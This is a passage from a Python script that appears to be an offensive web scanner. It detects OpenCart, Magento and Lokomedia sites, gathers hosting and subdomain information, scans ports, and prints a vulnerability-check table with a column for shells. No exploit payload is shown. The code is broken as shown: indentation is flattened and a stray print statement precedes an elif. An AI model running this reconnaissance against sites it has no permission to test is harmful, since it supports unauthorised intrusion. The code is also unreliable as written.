r'route=product|OpenCart|route=common|catalog/view/theme'),
content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : OpenCart' % (good))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
############################
# #
# Magento #
# #
############################
#magento searching content to detect.
elif re.search(
re.compile(
r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'
), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Magento' % (good))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
############################
# #
# Lokomedia #
# #
############################
#lokomedia searching content to detect.
print(' %s Check Vulnerability' % (run))
elif re.search(re.compile(r'image/gif'), lm_content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Lokomedia' % (good))
print('------------------------------------------------')
domain_info(subdomains)
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
print(' %s Check Vulnerability' % (run))
elif re.search(re.compile(r'lokomedia'), lm2_content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Lokomedia' % (good))
print('------------------------------------------------')
domain_info(subdomains)
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
print(' %s Check Vulnerability' % (run))
############################
# #
# Unknown #
# #
############################
#no cms detect
else:
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Unknown' % (bad))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
